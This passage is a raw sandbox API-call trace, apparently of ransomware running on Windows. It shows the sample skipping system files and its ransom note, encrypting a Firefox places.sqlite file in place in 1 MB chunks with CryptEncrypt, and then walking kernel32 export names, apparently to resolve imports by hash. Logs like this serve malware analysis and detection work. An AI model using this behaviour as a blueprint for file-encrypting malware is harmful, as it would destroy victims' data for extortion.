halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite.eoyvu"), dwFlags=0x0) returned 1 [0081.623] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.623] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.624] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.624] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4c1a3d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb4c1a3d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x82b58970, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xa00000, dwReserved0=0x0, dwReserved1=0x0, cFileName="places.sqlite", cAlternateFileName="PLACES~1.SQL")) returned 1 [0081.624] lstrcmpiW (lpString1="places.sqlite", lpString2="DECRYPT-FILES.txt") returned 1 [0081.624] lstrcmpiW (lpString1="places.sqlite", lpString2="autorun.inf") returned 1 [0081.624] lstrcmpiW (lpString1="places.sqlite", lpString2="boot.ini") returned 1 [0081.624] lstrcmpiW (lpString1="places.sqlite", lpString2="desktop.ini") returned 1 [0081.624] lstrcmpiW (lpString1="places.sqlite", lpString2="ntuser.dat") returned 1 [0081.624] lstrcmpiW (lpString1="places.sqlite", lpString2="iconcache.db") returned 1 [0081.624] lstrcmpiW (lpString1="places.sqlite", lpString2="bootsect.bak") returned 1 [0081.624] lstrcmpiW (lpString1="places.sqlite", lpString2="ntuser.dat.log") returned 1 [0081.624] lstrcmpiW (lpString1="places.sqlite", lpString2="thumbs.db") returned -1 [0081.624] lstrcmpiW (lpString1="places.sqlite", lpString2="Bootfont.bin") returned 1 [0081.624] lstrlenW (lpString="places.sqlite") returned 13 [0081.624] lstrcmpiW (lpString1="sqlite", lpString2="lnk") returned 1 [0081.624] lstrcmpiW (lpString1="sqlite", lpString2="exe") returned 1 [0081.624] lstrcmpiW (lpString1="sqlite", lpString2="sys") returned -1 [0081.624] lstrcmpiW (lpString1="sqlite", lpString2="dll") returned 1 [0081.624] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0081.624] lstrlenW (lpString="places.sqlite") returned 13 [0081.624] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0081.624] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="places.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite" [0081.624] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.628] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0081.629] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d308 | out: lpFileSize=0x3f2d308*=10485760) returned 1 [0081.629] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.629] ReadFile (in: hFile=0x460, lpBuffer=0x3f2d314, nNumberOfBytesToRead=0x108, lpNumberOfBytesRead=0x3f2d310, lpOverlapped=0x0 | out: lpBuffer=0x3f2d314*, lpNumberOfBytesRead=0x3f2d310*=0x108, lpOverlapped=0x0) returned 1 [0081.630] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.630] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0081.630] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0081.630] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3f2d308*, pdwDataLen=0x3f2d2f4*=0x28, dwBufLen=0x100 | out: pbData=0x3f2d308*, pdwDataLen=0x3f2d2f4*=0x100) returned 1 [0081.630] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x3000, flProtect=0x4) returned 0x3aa0000 [0081.630] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x3000, flProtect=0x4) returned 0x4110000 [0081.631] ReadFile (in: hFile=0x460, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2d2ec, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2d2ec*=0x100000, lpOverlapped=0x0) returned 1 [0081.677] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.677] WriteFile (in: hFile=0x460, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2d2f0, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2d2f0*=0x100000, lpOverlapped=0x0) returned 1 [0081.680] ReadFile (in: hFile=0x460, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2d2ec, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2d2ec*=0x100000, lpOverlapped=0x0) returned 1 [0081.704] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.704] WriteFile (in: hFile=0x460, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2d2f0, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2d2f0*=0x100000, lpOverlapped=0x0) returned 1 [0081.706] ReadFile (in: hFile=0x460, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2d2ec, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2d2ec*=0x100000, lpOverlapped=0x0) returned 1 [0081.741] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.741] WriteFile (in: hFile=0x460, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2d2f0, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2d2f0*=0x100000, lpOverlapped=0x0) returned 1 [0081.743] ReadFile (in: hFile=0x460, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2d2ec, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2d2ec*=0x100000, lpOverlapped=0x0) returned 1 [0081.764] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.764] WriteFile (in: hFile=0x460, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2d2f0, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2d2f0*=0x100000, lpOverlapped=0x0) returned 1 [0081.767] ReadFile (in: hFile=0x460, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2d2ec, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2d2ec*=0x100000, lpOverlapped=0x0) returned 1 [0081.805] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.805] WriteFile (in: hFile=0x460, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2d2f0, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2d2f0*=0x100000, lpOverlapped=0x0) returned 1 [0081.807] ReadFile (in: hFile=0x460, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2d2ec, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2d2ec*=0x100000, lpOverlapped=0x0) returned 1 [0081.845] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.845] WriteFile (in: hFile=0x460, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2d2f0, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2d2f0*=0x100000, lpOverlapped=0x0) returned 1 [0081.847] ReadFile (in: hFile=0x460, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2d2ec, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2d2ec*=0x100000, lpOverlapped=0x0) returned 1 [0081.871] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.871] WriteFile (in: hFile=0x460, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2d2f0, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2d2f0*=0x100000, lpOverlapped=0x0) returned 1 [0081.874] ReadFile (in: hFile=0x460, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2d2ec, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2d2ec*=0x100000, lpOverlapped=0x0) returned 1 [0081.883] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.883] WriteFile (in: hFile=0x460, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2d2f0, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2d2f0*=0x100000, lpOverlapped=0x0) returned 1 [0081.885] ReadFile (in: hFile=0x460, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2d2ec, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2d2ec*=0x100000, lpOverlapped=0x0) returned 1 [0081.894] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.894] WriteFile (in: hFile=0x460, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2d2f0, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2d2f0*=0x100000, lpOverlapped=0x0) returned 1 [0081.909] ReadFile (in: hFile=0x460, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2d2ec, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2d2ec*=0x100000, lpOverlapped=0x0) returned 1 [0081.947] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.947] WriteFile (in: hFile=0x460, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2d2f0, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2d2f0*=0x100000, lpOverlapped=0x0) returned 1 [0081.949] ReadFile (in: hFile=0x460, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2d2ec, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2d2ec*=0x0, lpOverlapped=0x0) returned 1 [0081.949] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.949] WriteFile (in: hFile=0x460, lpBuffer=0x3f2d308*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d2f0, lpOverlapped=0x0 | out: lpBuffer=0x3f2d308*, lpNumberOfBytesWritten=0x3f2d2f0*=0x108, lpOverlapped=0x0) returned 1 [0081.958] VirtualFree (lpAddress=0x3aa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.963] VirtualFree (lpAddress=0x4110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.968] CloseHandle (hObject=0x460) returned 1 [0081.968] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.968] GetTickCount () returned 0x114cf80 [0081.968] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.969] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0081.969] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0081.969] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0081.969] lstrlenA (lpString="kernel32.dll") returned 12 [0081.969] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0081.969] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0081.969] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0081.969] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0081.969] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0081.969] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0081.969] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0081.969] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0081.970] lstrlenA (lpString="ADDATOMA") returned 8 [0081.970] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0081.970] lstrlenA (lpString="ADDATOMW") returned 8 [0081.970] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0081.970] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0081.970] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0081.970] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0081.970] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0081.970] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0081.970] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0081.970] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0081.970] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0081.970] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0081.970] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0081.970] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0081.970] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0081.970] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0081.970] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0081.970] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0081.970] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0081.970] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0081.970] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0081.970] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0081.970] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0081.970] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0081.970] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0081.970] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0081.970] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0081.970] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0081.970] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0081.970] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0081.970] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0081.970] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0081.970] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0081.970] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0081.970] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0081.970] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0081.971] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0081.971] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0081.971] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0081.971] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0081.971] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0081.971] lstrlenA (lpString="BACKUPREAD") returned 10 [0081.971] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0081.971] lstrlenA (lpString="BACKUPSEEK") returned 10 [0081.971] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0081.971] lstrlenA (lpString="BACKUPWRITE") returned 11 [0081.971] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0081.971] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0081.971] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0081.971] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0081.971] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0081.971] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0081.971] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0081.971] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0081.971] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0081.971] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0081.971] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0081.971] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0081.971] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0081.971] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0081.971] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0081.971] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0081.971] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0081.971] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0081.971] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0081.971] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0081.971] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0081.971] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0081.971] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0081.971] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0081.971] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0081.971] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0081.971] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0081.972] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0081.972] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0081.972] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0081.972] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0081.972] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0081.972] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0081.972] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0081.972] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0081.972] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0081.972] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0081.972] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0081.972] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0081.972] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0081.972] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0081.972] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0081.972] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0081.972] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0081.972] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0081.972] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0081.972] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0081.972] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0081.972] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0081.972] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0081.972] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0081.972] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0081.972] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0081.972] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0081.972] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0081.972] 